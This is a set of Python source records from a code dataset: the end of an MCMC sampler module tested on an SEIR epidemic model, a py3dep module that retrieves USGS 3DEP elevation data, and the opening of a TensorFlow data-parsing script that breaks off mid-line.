'*(size-count)+']'+'%d%%'%int((1.0*count/size)*100))\n sys.stdout.write('\\r')\n sys.stdout.flush()\n sys.stdout.write('\\n')\n\n return([i.samps for i in self])\n\nclass MetHastChain_NormProp(object):\n def __init__(self,dat,post,start,size=1):\n self.data = dat\n self.post = post\n self.size = size\n self.dim = [size,np.shape(start)[0]]\n self.samps = np.zeros(self.dim)\n self.samps[0,:] = start\n self.curr = self.samps[0]\n self.t = 0\n\n def posterior(self,x):\n return(self.post(x,self.data))\n\n def propose(self,var):\n self.cand = np.random.multivariate_normal(self.curr,var,1)[0]\n\n def update(self,var):\n self.cand = np.random.multivariate_normal(self.curr,var,1)[0]\n if (self.posterior(self.curr) == 0.0) or np.isnan(self.posterior(self.curr)):\n self.a = 0\n\n else:\n self.a = min(1,self.posterior(self.cand)/self.posterior(self.curr))\n\n if (np.random.binomial(1,self.a,1)==1) and (self.t < self.size):\n self.samps[self.t,:] = self.cand\n self.curr = self.cand\n\n elif (np.random.binomial(1,self.a,1)==0) and (self.t < self.size):\n self.samps[self.t,:] = self.curr\n\n elif (np.random.binomial(1,self.a,1)==1) and (self.t >= self.size):\n self.samps = np.append(self.samps,[self.cand],axis=0)\n self.curr=self.cand\n\n else:\n self.samps = np.append(self.samps,[self.curr],axis=0)\n\n self.t += 1\n\n def burn(self,var,N=1):\n size = 40\n sys.stdout.write(\"[%s]\" % (\" \" * 20))\n sys.stdout.flush()\n sys.stdout.write('\\b'*(size+2))\n for i in range(0,N):\n self.update(var)\n self.t -= 1\n\n count = int((size*1.0*i)/N)+1\n sys.stdout.write('['+'='*count+' '*(size-count)+']'+'%d%%'%int((1.0*count/size)*100))\n sys.stdout.write('\\r')\n sys.stdout.flush()\n sys.stdout.write('\\n')\n #self.t += 1\n\nclass ShrinkingBullseyeChain_NormProp(object):\n def __init__(self,dat,prior,like,fwdMod,start,S,fS,size=1):\n self.data = dat\n self.prior = prior\n self.like = like\n self.fwdMod = fwdMod\n \n self.size = size\n self.shape = [size,np.shape(start)[0]]\n self.dim = np.shape(start)[0]\n self.samps = np.zeros(self.shape)\n\n self.Ndef = 
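# Compact standalone version of the Metropolis step MetHastChain_NormProp.update
# implements above: propose from a symmetric Gaussian, accept with probability
# min(1, post(cand)/post(curr)). The target density below is illustrative.
import numpy as np

def metropolis(post, x0, n, step=0.5):
    xs, x = [x0], x0
    for _ in range(n):
        cand = x + step * np.random.randn()
        # mirror the snippet's guard: never move off a zero-density point
        a = min(1.0, post(cand) / post(x)) if post(x) > 0 else 0.0
        if np.random.rand() < a:
            x = cand
        xs.append(x)
    return np.array(xs)

# e.g. draws from an unnormalised standard normal:
# metropolis(lambda t: np.exp(-0.5 * t * t), 0.0, 1000)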
int((2*self.dim+1)*(self.dim+2)/2)\n self.N = int(np.ceil(np.sqrt(self.dim)*self.Ndef))\n \n self.samps[0,:] = start\n self.curr = self.samps[0]\n\n self.refine_tracker = []\n\n if np.ndim(S)==1:\n self.S = np.reshape(S,[np.shape(S)[0],1])\n\n elif np.ndim(fS)==1:\n self.fS = np.reshape(fS,[np.shape(fS)[0],1])\n\n else:\n self.S = S\n self.fS = fS\n \n self.t = 0\n self.accept_freq = 0\n\n def radCalc(self,x,samps,N):\n if N > np.shape(self.S)[0]:\n print('Not possible!')\n return()\n\n radii = np.sort(npla.norm(self.S-x,ord=2,axis=1))\n R = radii[N]\n return(R)\n\n #Functions to calculate regression of fwd model response at candidate point and at current point\n def cand_regress(self):\n cand_Rdef = self.radCalc(self.cand,self.S,self.Ndef)\n cand_R = self.radCalc(self.cand,self.S,self.N)\n self.cand_B = self.S[npla.norm(self.S-self.cand,ord=2,axis=1) <= cand_R]\n self.cand_fB = self.fS[npla.norm(self.S-self.cand,ord=2,axis=1) <= cand_R]\n while np.shape(self.cand_B)[0] > self.N:\n self.cand_B = np.delete(self.cand_B,np.random.choice(range(0,np.shape(self.cand_B)[0])),axis=0)\n self.cand_fB = np.delete(self.cand_fB,np.random.choice(range(0,np.shape(self.cand_fB)[0])),axis=0)\n \n W = np.sqrt([min(1,(1-((npla.norm(self.cand_B[i,:]-self.cand)-cand_Rdef)/(cand_R-cand_Rdef))**3)**3) for i in range(0,np.shape(self.cand_B)[0])])\n W = np.diag(W)\n self.cand_W = W\n \n phi = np.zeros([self.N,2*self.dim+1])\n phi[:,0] = np.ones(self.N)\n phi[:,1:(self.dim+1)] = self.cand_B\n phi[:,(self.dim+1):(2*self.dim+1)] = self.cand_B**2\n self.cand_phi = phi\n\n self.cand_q,self.cand_r = npla.qr(np.dot(W,phi),mode='complete')\n q = self.cand_q[:,0:self.cand_r.shape[1]]\n r = self.cand_r[0:self.cand_r.shape[1],:]\n \n self.cand_Z = np.dot(npla.inv(r),q.T)\n self.cand_Z = np.dot(self.cand_Z,np.dot(W,self.cand_fB))\n\n def curr_regress(self): \n curr_Rdef = self.radCalc(self.curr,self.S,self.Ndef)\n curr_R = self.radCalc(self.curr,self.S,self.N)\n self.curr_B = self.S[npla.norm(self.S-self.curr,ord=2,axis=1) <= curr_R]\n self.curr_fB = self.fS[npla.norm(self.S-self.curr,ord=2,axis=1) <= curr_R]\n while np.shape((self.curr_B))[0] > self.N:\n self.curr_B = np.delete(self.curr_B,np.random.choice(range(0,np.shape(self.curr_B)[0])),axis=0)\n self.curr_fB = np.delete(self.curr_fB,np.random.choice(range(0,np.shape(self.curr_fB)[0])),axis=0)\n \n W = np.sqrt([min(1,(1-((npla.norm(self.curr_B[i,:]-self.curr)-curr_Rdef)/(curr_R-curr_Rdef))**3)**3) for i in range(0,np.shape(self.curr_B)[0])])\n W = np.diag(W)\n self.curr_W = W\n \n phi = np.zeros([self.N,2*self.dim+1])\n phi[:,0] = np.ones(self.N)\n phi[:,1:(self.dim+1)] = self.curr_B\n phi[:,(self.dim+1):(2*self.dim+1)] = self.curr_B**2\n self.curr_phi = phi\n\n self.curr_q,self.curr_r = npla.qr(np.dot(W,phi), mode='complete')\n q = self.curr_q[:,0:self.curr_r.shape[1]]\n r = self.curr_r[0:self.curr_r.shape[1],:] \n \n self.curr_Z = np.dot(npla.inv(r),q.T)\n self.curr_Z = np.dot(self.curr_Z,np.dot(W,self.curr_fB))\n\n #Functions to cross validate the regression at the candidate and current points\n def cand_cross_val(self,curr_post,eps):\n a_list = np.zeros(self.N)\n\n for i in range(0,self.N):\n if self.cand_r.shape[0] > self.cand_r.shape[1]:\n cand_q_up, cand_r_up = scla.qr_delete(self.cand_q,self.cand_r,k=i)\n q = cand_q_up[:,0:cand_r_up.shape[1]]\n r = cand_r_up[0:cand_r_up.shape[1],:]\n\n elif self.cand_r.shape[0] == self.cand_r.shape[1]:\n cand_q_up, cand_r_up = scla.qr_delete(self.cand_q,self.cand_r,k=i)\n q = cand_q_up\n r = cand_r_up\n\n else:\n cand_q_up, 
cand_r_up = scla.qr_delete(self.cand_q,self.cand_r,k=i)\n q = cand_q_up[:,0:cand_r_up.shape[1]]\n r = cand_r_up[0:cand_r_up.shape[1],:] \n \n \n cand_Z = np.dot(npla.inv(r),q.T) \n cand_Z = np.dot(cand_Z,np.dot(self.cand_W[np.arange(self.N)!=i,:][:,np.arange(self.N)!=i],self.cand_fB[np.arange(self.N)!= i,:]))\n\n cand = self.cand\n cand_post = self.prior(self.cand)*self.like(np.dot(np.append(1,np.append(cand,cand**2)),self.cand_Z))\n\n if cand_post == 0.0:\n a_list[i] = 0\n\n else: \n a_list[i] = min(1,cand_post/curr_post)\n\n self.a_list = a_list\n err_list = np.abs(self.a-a_list)# + np.abs(min(1,1./self.a)-np.array([min(1,1./a) for a in a_list]))\n err = np.max(err_list)\n if err >= eps:\n flag = 1\n else:\n flag =0\n\n return(flag)\n \n\n def curr_cross_val(self,cand_post,eps):\n a_list = np.zeros(self.N)\n\n for i in range(0,self.N):\n if self.cand_r.shape[0] > self.cand_r.shape[1]:\n curr_q_up, curr_r_up = scla.qr_delete(self.curr_q,self.curr_r,k=i)\n q = curr_q_up[:,0:curr_r_up.shape[1]]\n r = curr_r_up[0:curr_r_up.shape[1],:]\n\n elif self.curr_r.shape[0] == self.curr_r.shape[1]:\n curr_q_up, curr_r_up = scla.qr_delete(self.curr_q,self.curr_r,k=i)\n q = curr_q_up\n r = curr_r_up\n\n else:\n curr_q_up, curr_r_up = scla.qr_delete(self.curr_q,self.curr_r,k=i)\n q = curr_q_up[:,0:curr_r_up.shape[1]]\n r = curr_r_up[0:curr_r_up.shape[1],:]\n \n curr_Z = np.dot(npla.inv(r),q.T)\n curr_Z = np.dot(curr_Z,np.dot(self.curr_W[np.arange(self.N)!=i,:][:,np.arange(self.N)!=i],self.curr_fB[np.arange(self.N)!= i,:]))\n\n curr = self.curr\n curr_post = self.prior(self.curr)*self.like(np.dot(np.append(1,np.append(curr,curr**2)),self.curr_Z))\n\n if cand_post == 0.0:\n a_list[i] = 0\n\n else: \n a_list[i] = min(1,cand_post/curr_post)\n\n \n err_list = np.abs(min(1,self.a)-np.array([a for a in a_list]))# + np.abs(min(1,1./self.a)-np.array([min(1,1./a) for a in a_list]))\n err = np.max(err_list)\n if err >= eps:\n flag = 1\n else:\n flag =0\n\n return(flag)\n\n\n def propose(self,var):\n self.cand = np.random.multivariate_normal(self.curr,var,1)[0]\n\n #Functions to refine parameter samples\n\n def refine(self,theta,R):\n cons = ({'type' : 'ineq', 'fun': lambda x: R - npla.norm(x - theta, ord=2)},{'type' : 'ineq', 'fun': lambda x: self.prior(x)})\n sol = sp.optimize.minimize(lambda x: -1*np.log(min(npla.norm(x-self.S,ord=2,axis=1))), theta, constraints=cons, options = {'maxiter' : 10000})\n self.refine_tracker.append(self.t)\n return(sol['x'])\n \n def cand_refine(self):\n update = self.refine(self.cand,self.radCalc(self.cand,self.S,self.Ndef))\n self.S = np.vstack([self.S,update])\n self.fS = np.vstack([self.fS,self.fwdMod(update)])\n\n def curr_refine(self):\n update = self.refine(self.curr,self.radCalc(self.curr,self.S,self.Ndef))\n self.S = np.vstack([self.S,update])\n self.fS = np.vstack([self.fS,self.fwdMod(update)])\n \n #Update routine\n def update(self,var): \n self.cand = np.random.multivariate_normal(self.curr,var,1)[0]\n\n self.cand_regress()\n\n if self.t==0:\n self.curr_regress()\n\n self.cand_p = self.cand\n self.curr_p = self.curr\n self.cand_post = self.prior(self.cand)*self.like(np.dot(np.append(1,np.append(self.cand_p,self.cand_p**2)),self.cand_Z))\n self.curr_post = self.prior(self.curr)*self.like(np.dot(np.append(1,np.append(self.curr_p,self.curr_p**2)),self.curr_Z))\n\n if (self.cand_post == 0.0) or np.isnan(self.cand_post):\n self.a = 0\n\n else: \n self.a = min(1,self.cand_post/self.curr_post)\n\n eps = 0.1*(self.t+1)**(-0.1)\n rand_refine = 0.01*(self.t+1)**(-0.2)\n #eps = 
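# cand_regress/curr_regress above fit a local quadratic surrogate by weighted
# least squares through a QR factorisation. A minimal 1-D sketch of that
# pattern (illustrative names; w holds the tricube weights, as in the snippet):
import numpy as np

def local_quadratic_fit(xs, ys, w):
    phi = np.column_stack([np.ones_like(xs), xs, xs ** 2])  # [1, x, x^2] basis
    W = np.diag(np.sqrt(w))
    q, r = np.linalg.qr(W @ phi)
    return np.linalg.solve(r, q.T @ (W @ ys))  # coefficients [c0, c1, c2]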
0.1**(-0.1)\n #rand_refine = 0.01\n\n while self.cand_cross_val(self.curr_post,eps):\n self.cand_refine()\n self.cand_regress()\n \n self.cand_p = np.append(1,np.append(self.cand,self.cand**2))\n self.curr_p = np.append(1,np.append(self.curr,self.curr**2))\n self.cand_post = self.prior(self.cand)*self.like(np.dot(self.cand_p,self.cand_Z))\n self.curr_post = self.prior(self.curr)*self.like(np.dot(self.curr_p,self.curr_Z))\n\n if (self.cand_post==0.0) or np.isnan(self.cand_post):\n self.a = 0\n \n else:\n self.a = min(1,self.cand_post/self.curr_post)\n\n \n while self.curr_cross_val(self.cand_post,eps):\n self.curr_refine()\n self.curr_regress()\n\n self.cand_p = self.cand\n self.curr_p = self.curr\n self.cand_post = self.prior(self.cand)*self.like(np.dot(np.append(1,np.append(self.cand_p,self.cand_p**2)),self.cand_Z))\n self.curr_post = self.prior(self.curr)*self.like(np.dot(np.append(1,np.append(self.curr_p,self.curr_p**2)),self.curr_Z))\n\n if self.cand_post==0.0:\n self.a = 0\n \n else:\n self.a = min(1,self.cand_post/self.curr_post)\n\n \n if np.random.binomial(1,rand_refine)==1:\n self.cand_refine()\n self.curr_refine()\n\n move = np.random.binomial(1,self.a,1)\n if (move==1) and (self.t < self.size):\n self.samps[self.t,:] = self.cand\n self.curr = self.cand\n self.curr_Z = self.cand_Z\n self.accept_freq += 1\n\n elif (move==0) and (self.t < self.size):\n self.samps[self.t,:] = self.curr\n\n elif (move==1) and (self.t >= self.size):\n self.samps = np.append(self.samps,[self.cand],axis=0)\n self.curr=self.cand\n self.curr_Z = self.cand_Z\n self.accept_freq += 1\n\n else:\n self.samps = np.append(self.samps,[self.curr],axis=0)\n\n self.t += 1\n\n def burn(self,var,N=1):\n size = 40\n sys.stdout.write(\"[%s]\" % (\" \" * 20))\n sys.stdout.flush()\n sys.stdout.write('\\b'*(size+2))\n for i in range(0,N):\n self.update(var)\n self.t -= 1\n self.accept_freq = 0\n\n count = int((size*1.0*i)/N)+1\n sys.stdout.write('['+'='*count+' '*(size-count)+']'+'%d%%'%int((1.0*count/size)*100))\n sys.stdout.write('\\r')\n sys.stdout.flush()\n sys.stdout.write('\\n')\n\n \n \n###############################\n#Testing the SB Implementation#\n###############################\ndef SEIR(y,t,a,b,c):\n s,e,i,r = y\n yprime = [-b*s*i, b*s*i - a*e, a*e - c*i,c*i]\n return(yprime)\n\ndef fwdMod(parms,t1,t_steps = 1000,y0=[99,0,1,0]):\n times = np.linspace(0,t1,t_steps)\n a,b,c = parms\n output,info = sp.integrate.odeint(SEIR,y0,times,args=(a,b,c), full_output=True)\n return(output[-1,:])\n \ndef fwd(x):\n hold = np.array([.3,x,.5])\n return(fwdMod(np.array(hold),3).clip(min=0))\n\ntrue_parms = np.array([.3,np.random.uniform(0,1.5),.5])\ntest_dat = np.zeros([10,4])\ntrue_traj = fwd(true_parms[1])\nfor i in range(0,10):\n test_dat[i,] = fwdMod(true_parms,3) + np.random.multivariate_normal(np.zeros(4),10*np.eye(4))\n\ndef test_like(x):\n var = 10*np.eye(4)\n like = [sp.stats.multivariate_normal.pdf(test_dat[i,],x,var) for i in range(0,np.shape(test_dat)[0])]\n #like = [sp.stats.binom.pmf(test_dat[i,j], x[j], .9) for i in range(0,10) for j in range(0,4)]\n return(np.prod(like))\n\ndef test_prior(x):\n if np.array([x < 0.]).any() or np.array([x > 10.]).any():\n return(0.)\n\n else:\n return(1)\n\ndef test_post(x,dat=0):\n return(test_prior(x)*test_like(fwd(x)))\n\ndef gr_diag(x):\n n = float(x.shape[0])\n m = float(x.shape[1])\n B = np.sum((np.mean(x,axis=0)-np.mean(x))**2)*(n/(m-1))\n W = np.mean(np.var(x,axis=0))/m\n V = ((n-1)/n)*W + ((m+1)/(m*n))*B\n R = np.sqrt(2*V/W)\n return(R)\n\ntest_S = 
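# gr_diag above is a Gelman-Rubin-style diagnostic. For reference, the usual
# textbook split (with chains in rows, matching x.shape[0] chains of length
# x.shape[1]) is B = m*var(chain means), W = mean(within-chain variances),
# V = ((m-1)/m)*W + B/m, R-hat = sqrt(V/W); the snippet's scaling differs, so
# treat this as a hedged reference, not a drop-in replacement:
import numpy as np

def r_hat(chains):  # chains: array of shape (n_chains, m_draws)
    m = chains.shape[1]
    B = m * np.var(chains.mean(axis=1), ddof=1)
    W = chains.var(axis=1, ddof=1).mean()
    V = (m - 1) / m * W + B / m
    return np.sqrt(V / W)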
np.zeros([1000,1])\ntest_fS = np.zeros([1000,4])\nfor i in range(0,1000):\n test_S[i,:] = [np.random.uniform(0,10) for j in range(0,1)]\n test_fS[i,:] = fwd(test_S[i])\n #test_fS[i,:] = test_like(fwd(test_S[i]))\n\nstart = np.array([np.random.uniform(0,1.5) for t in range(0,1)])\n\nn_samps = 70000\ntest_sampler = Sampler(test_dat,test_prior,test_like,start,4,2,n_samps,fwd,test_S,test_fS)\n\nstart_time = time.time()\n\nburn_var = .1\ntest_sampler.burn(burn_var*np.eye(1),int(.1*n_samps))\n\nprop_var = .01\ntest_sampler.sample(prop_var*np.eye(1),n_samps)\n\nend_time = time.time()\nrun_time = end_time - start_time\n\nref_sampler = Sampler(test_dat,test_prior,test_like,start,4,1,n_samps,fwd,test_S,test_fS)\n\nstart_time = time.time()\nref_sampler.burn(burn_var*np.eye(1),int(.1*n_samps))\n\nref_sampler.sample(prop_var*np.eye(1),n_samps)\n\nend_time = time.time()\nref_time = end_time - start_time\n\n\n#$$$$$$$$$$$$$$$$$$$$$$$$#\n#$$$$$$$$$$CRUFT$$$$$$$$$#\n#$$$$$$$$$$$$$$$$$$$$$$$$#\n\n#test_chain = ShrinkingBullseyeChain_NormProp(test_dat,test_prior,test_like,fwd,np.abs(start),test_S,test_fS,size=10)\n#test_chain = ShrinkingBullseyeChain_NormProp_LikeRegress(test_dat,test_prior,test_like,fwd,np.abs(start),test_S,test_fS,size=10)\n#test_chain = MetHastChain_NormProp(test_dat,test_post,start) \n\n#hold = np.zeros([10000,2])\n#for i in range(0,10000):\n# print(test_chain.curr)\n# test_chain.update(var_val*np.eye(1))\n# print(test_chain.cand)\n# hold[i,:] = test_chain.curr\n# print(test_chain.a)\n\n#########################\n#Plotting the likelihood#\n#########################\n#def plot_like(x,n):\n# hold = true_parms.copy()\n# hold[n] = x\n# return(test_like(fwd(hold)))\n#\n#x = np.linspace(0, 2*max(true_parms),1000)\n#y0 = np.array([plot_like(t,0) for t in x])\n#y1 = np.array([plot_like(t,1) for t in x])\n#y2 = np.array([plot_like(t,2) for t in x])\n#\n#plt.plot(x,y0)\n#plt.plot(x,y1)\n#plt.plot(x,y2)\n","sub_path":"Code/Shrinking_Bullseye_First_Build/mcmc.py","file_name":"mcmc.py","file_ext":"py","file_size_in_byte":18230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"372853421","text":"\"\"\"Get data from 3DEP database.\"\"\"\nfrom itertools import product\nfrom pathlib import Path\nfrom typing import Dict, Iterator, List, Optional, Tuple, Union\n\nimport cytoolz as tlz\nimport numpy as np\nimport pygeoutils as geoutils\nimport rasterio as rio\nimport rasterio.warp as rio_warp\nimport xarray as xr\nfrom pygeoogc import WMS, MatchCRS, RetrySession, ServiceURL\nfrom shapely.geometry import MultiPolygon, Polygon\n\nfrom .exceptions import InvalidInputType\n\nDEF_CRS = \"epsg:4326\"\n\n\ndef get_map(\n layers: Union[str, List[str]],\n geometry: Union[Polygon, Tuple[float, float, float, float]],\n resolution: float,\n geo_crs: str = DEF_CRS,\n crs: str = DEF_CRS,\n output_dir: Optional[Union[str, Path]] = None,\n) -> Dict[str, bytes]:\n \"\"\"Access to `3DEP `__ service.\n\n The 3DEP service has multi-resolution sources so depending on the user\n provided resolution the data is resampled on server-side based\n on all the available data sources. 
The following layers are available:\n - \"DEM\"\n - \"Hillshade Gray\"\n - \"Aspect Degrees\"\n - \"Aspect Map\"\n - \"GreyHillshade_elevationFill\"\n - \"Hillshade Multidirectional\"\n - \"Slope Map\"\n - \"Slope Degrees\"\n - \"Hillshade Elevation Tinted\"\n - \"Height Ellipsoidal\"\n - \"Contour 25\"\n - \"Contour Smoothed 25\"\n\n Parameters\n ----------\n layers : str or list\n A valid 3DEP layer or a list of them\n geometry : Polygon, MultiPolygon, or tuple\n A shapely Polygon or a bounding box (west, south, east, north)\n resolution : float\n The data resolution in meters. The width and height of the output are computed in pixel\n based on the geometry bounds and the given resolution.\n geo_crs : str, optional\n The spatial reference system of the input geometry, defaults to\n epsg:4326.\n crs : str, optional\n The spatial reference system to be used for requesting the data, defaults to\n epsg:4326.\n output_dir : str or Path, optional\n The output directory to also save the map as GTiff file(s), defaults to None.\n\n Returns\n -------\n dict\n A dict where the keys are the layer name and values are the returned response\n from the WMS service as bytes. You can use ``utils.create_dataset`` function\n to convert the responses to ``xarray.Dataset``.\n \"\"\"\n if not isinstance(geometry, (Polygon, MultiPolygon, tuple)):\n raise InvalidInputType(\"geometry\", \"Polygon or tuple of length 4\")\n\n _geometry = geoutils.geo2polygon(geometry, geo_crs, crs)\n\n _layers = layers if isinstance(layers, list) else [layers]\n if \"DEM\" in _layers:\n _layers[_layers.index(\"DEM\")] = \"None\"\n\n _layers = [f\"3DEPElevation:{lyr}\" for lyr in _layers]\n\n wms = WMS(ServiceURL().wms.nm_3dep, layers=_layers, outformat=\"image/tiff\", crs=crs)\n r_dict = wms.getmap_bybox(_geometry.bounds, resolution, box_crs=crs)\n\n if output_dir:\n geoutils.gtiff2file(r_dict, _geometry, crs, output_dir)\n\n ds = geoutils.gtiff2xarray(r_dict, _geometry, crs)\n\n valid_layers = wms.get_validlayers()\n rename = {lyr: lyr.split(\":\")[-1].replace(\" \", \"_\").lower() for lyr in valid_layers}\n rename.update({\"3DEPElevation:None\": \"elevation\"})\n\n if isinstance(ds, xr.DataArray):\n ds.name = rename[ds.name]\n else:\n ds = ds.rename({n: rename[n] for n in ds.keys()})\n\n return ds\n\n\ndef elevation_bygrid(\n xcoords: List[float],\n ycoords: List[float],\n crs: str,\n resolution: float,\n dim_names: Optional[Tuple[str, str]] = None,\n resampling: rio_warp.Resampling = rio_warp.Resampling.bilinear,\n) -> xr.DataArray:\n \"\"\"Get elevation from DEM data for a grid.\n\n This function is intended for getting elevations for a gridded dataset.\n\n Parameters\n ----------\n xcoords : tuple of two lists of floats\n A list containing x-coordinates of a mesh.\n ycoords : tuple of two lists of floats\n A list containing y-coordinates of a mesh.\n crs : str\n The spatial reference system of the input grid, defaults to epsg:4326.\n resolution : float\n The accuracy of the output, defaults to 10 m which is the highest\n available resolution that covers CONUS. Note that higher resolution\n increases computation time so chose this value with caution.\n dim_names : tuple\n A tuple of length two containing the coordinate names, defaults to [\"x\", \"y\"]\n resampling : rasterio.warp.Resampling\n The reasmpling method to use if the input crs is not in the supported\n 3DEP's CRS list which are epsg:4326 and epsg:3857. 
It defaults to bilinear.\n        The available methods can be found `here `__\n\n    Returns\n    -------\n    xarray.DataArray\n        A data array with name elevation and the given dim names.\n    \"\"\"\n    if dim_names is None:\n        dim_names = (\"x\", \"y\")\n\n    bbox = (min(xcoords), min(ycoords), max(xcoords), max(ycoords))\n    r_dict = _elevation_bybox(bbox, crs, resolution)\n    coords = product(xcoords, ycoords)\n    elev_arr = _sample_tiff(r_dict[\"3DEPElevation:None_dd_0_0\"], coords, crs, resampling)\n\n    return xr.DataArray(\n        elev_arr.reshape((len(xcoords), len(ycoords))),\n        dims=dim_names,\n        coords=[xcoords, ycoords],\n        name=\"elevation\",\n        attrs={\"units\": \"meters\"},\n    )\n\n\ndef _sample_tiff(\n    content: bytes,\n    coords: Union[List[Tuple[float, float]], Iterator[Tuple[float, float]]],\n    crs: str,\n    resampling: rio_warp.Resampling,\n) -> np.ndarray:\n    \"\"\"Sample a tiff response for a list of coordinates.\n\n    Parameters\n    ----------\n    content : bytes\n        The raw GeoTIFF response from the WMS service.\n    coords : list of tuples\n        A list containing x- and y-coordinates of a mesh, [(x, y), ...].\n    crs : str\n        The spatial reference system of the input grid, defaults to epsg:4326.\n    resampling : rasterio.warp.Resampling\n        The resampling method to use if the input crs is not in the supported\n        3DEP's CRS list which are epsg:4326 and epsg:3857. It defaults to bilinear.\n        The available methods can be found `here `__\n\n    Returns\n    -------\n    numpy.ndarray\n        An array of elevations where its index matches the input coords list\n    \"\"\"\n    with rio.MemoryFile() as memfile:\n        memfile.write(content)\n        with memfile.open() as src:\n            transform, width, height = rio_warp.calculate_default_transform(\n                src.crs, crs, src.width, src.height, *src.bounds\n            )\n            kwargs = src.meta.copy()\n            kwargs.update({\"crs\": crs, \"transform\": transform, \"width\": width, \"height\": height})\n\n            with rio.vrt.WarpedVRT(src, **kwargs) as vrt:\n                if crs != src.crs:\n                    for i in range(1, src.count + 1):\n                        rio_warp.reproject(\n                            source=rio.band(src, i),\n                            destination=rio.band(vrt, i),\n                            src_transform=src.transform,\n                            src_crs=src.crs,\n                            dst_transform=transform,\n                            dst_crs=crs,\n                            resampling=resampling,\n                        )\n                return np.array([e.item() for e in vrt.sample(coords)])\n\n\ndef _elevation_bybox(\n    bbox: Tuple[float, float, float, float],\n    crs: str,\n    resolution: float,\n) -> Dict[str, bytes]:\n    \"\"\"Get elevation from DEM data for a bounding box.\n\n    This function is intended for getting elevations for a gridded dataset.\n\n    Parameters\n    ----------\n    bbox : tuple of four floats\n        The bounding box of the region of interest, (west, south, east, north).\n    crs : str\n        The spatial reference system of the input grid, defaults to epsg:4326.\n    resolution : float\n        The accuracy of the output, defaults to 10 m which is the highest\n        available resolution that covers CONUS. 
Note that higher resolution\n        increases computation time so choose this value with caution.\n\n    Returns\n    -------\n    dict\n        A dict of the GeoTIFF responses from the WMS service as bytes.\n    \"\"\"\n    if not isinstance(bbox, tuple) or len(bbox) != 4:\n        raise InvalidInputType(\"bbox\", \"tuple of length 4\")\n\n    ratio_min = 0.01\n    ratio_x = abs((bbox[2] - bbox[0]) / bbox[0])\n    ratio_y = abs((bbox[3] - bbox[1]) / bbox[1])\n    if (ratio_x < ratio_min) or (ratio_y < ratio_min):\n        rad = ratio_min * abs(bbox[0])\n        bbox = (bbox[0] - rad, bbox[1] - rad, bbox[2] + rad, bbox[3] + rad)\n\n    req_crs = crs if crs.lower() in [DEF_CRS, \"epsg:3857\"] else DEF_CRS\n    wms = WMS(\n        ServiceURL().wms.nm_3dep, layers=\"3DEPElevation:None\", outformat=\"image/tiff\", crs=req_crs\n    )\n    return wms.getmap_bybox(bbox, resolution, box_crs=crs)\n\n\ndef elevation_bycoords(coords: List[Tuple[float, float]], crs: str = DEF_CRS) -> List[int]:\n    \"\"\"Get elevation from Airmap for a list of coordinates.\n\n    Parameters\n    ----------\n    coords : list of tuples\n        Coordinates of the location as a tuple\n    crs : str, optional\n        The spatial reference of the input coord, defaults to epsg:4326 (lon, lat)\n\n    Returns\n    -------\n    list of int\n        Elevation in meters\n    \"\"\"\n    if not isinstance(coords, (list, Iterator)):\n        raise InvalidInputType(\"coord\", \"list (or iterator) of tuples of length 2\", \"[(x, y), ...]\")\n\n    if isinstance(coords, list) and any(len(c) != 2 for c in coords):\n        raise InvalidInputType(\"coord\", \"list of tuples of length 2\", \"[(x, y), ...]\")\n\n    coords_reproj = zip(*MatchCRS.coords(tuple(zip(*coords)), crs, DEF_CRS))\n    coords_reproj = tlz.partition_all(100, coords_reproj)\n\n    headers = {\"Content-Type\": \"application/json\", \"charset\": \"utf-8\"}\n    elevations = []\n    for chunk in coords_reproj:\n        payload = {\"points\": \",\".join(f\"{lat},{lon}\" for lon, lat in chunk)}\n        resp = RetrySession().get(ServiceURL().restful.airmap, payload=payload, headers=headers)\n        elevations.append(resp.json()[\"data\"])\n\n    return list(tlz.concat(elevations))\n\n\ndef deg2mpm(da: xr.DataArray) -> xr.DataArray:\n    \"\"\"Convert ``xarray.Data[Array,set]`` from degree to meter/meter.\"\"\"\n    attrs = da.attrs\n    da = np.tan(np.deg2rad(da))\n    da.attrs = attrs\n    da.name = \"slope\"\n    da.attrs[\"units\"] = \"meters/meters\"\n    return da\n","sub_path":"py3dep/py3dep.py","file_name":"py3dep.py","file_ext":"py","file_size_in_byte":10562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"356762405","text":"from __future__ import division\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.interpolate import interp2d\nimport tensorflow as tf\nimport numpy as np\nimport gzip\nimport time\nimport os\nimport sys\nimport tensorflow.contrib.slim as slim\nfrom random import shuffle\nfrom shutil import copyfile, copytree\n\n# Import base model for defining early stopping hook\n# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/training/session_run_hook.py\nfrom tensorflow.python.training import session_run_hook\nfrom tensorflow.python.training import training_util\n\n# Import plotting functions from 'reader.py'\n#from reader import *\n\n\n# Define list of transformations for data augmentation\ndef get_transformations(rotate=False, flip=False):\n    if rotate and flip:\n        #transformations = [[0,0], [0,1], [1,0], [1,1], [2,0], [2,1], [3,0], [3,1]]\n        transformations = [[0,0], [0,1], [2,0], [2,1]]\n    elif rotate:\n        #transformations = 
[[0,0], [1,0], [2,0], [3,0]]\n transformations = [[0,0], [2,0]]\n #transformations = [[0,0], [1,0]]\n elif flip:\n transformations = [[0,0], [0,1]]\n else:\n transformations = [[0,0]]\n return transformations\n\n# Transforms 'example_proto' byte strings into decoded\n# onehot label and resized image array \ndef _parse_data(example_proto, res=64, transformation=None):\n features = {\"data\": tf.FixedLenFeature([res,res,1], tf.float32),\n \"coeff\": tf.FixedLenFeature([res,res,1], tf.float32),\n \"mesh\": tf.FixedLenFeature((), tf.string, default_value=\"\"),\n \"soln\": tf.FixedLenFeature([res,res,1], tf.float32)}\n parsed_features = tf.parse_single_example(example_proto, features)\n\n # Scale solutions back to [-1,1] range (approximately)\n SOLN_SCALING = 100.0\n\n mesh = tf.decode_raw(parsed_features[\"mesh\"], tf.uint8)\n mesh = tf.cast(tf.reshape(mesh, [res, res, 1]), tf.float32)\n\n data = parsed_features[\"data\"]\n coeff = parsed_features[\"coeff\"]\n soln = tf.multiply(parsed_features[\"soln\"], SOLN_SCALING)\n\n # Apply transformation for data augmentation\n \"\"\"\n if transformation is not None:\n [rotation, flip] = transformation\n \n # Stacked data\n stacked = tf.stack([data, coeff, mesh, soln], 0)\n\n # Rotate data\n stacked = tf.image.rot90(stacked, k=rotation)\n\n # Flip data\n if flip == 1:\n stacked = tf.image.flip_left_right(stacked)\n true_fn = 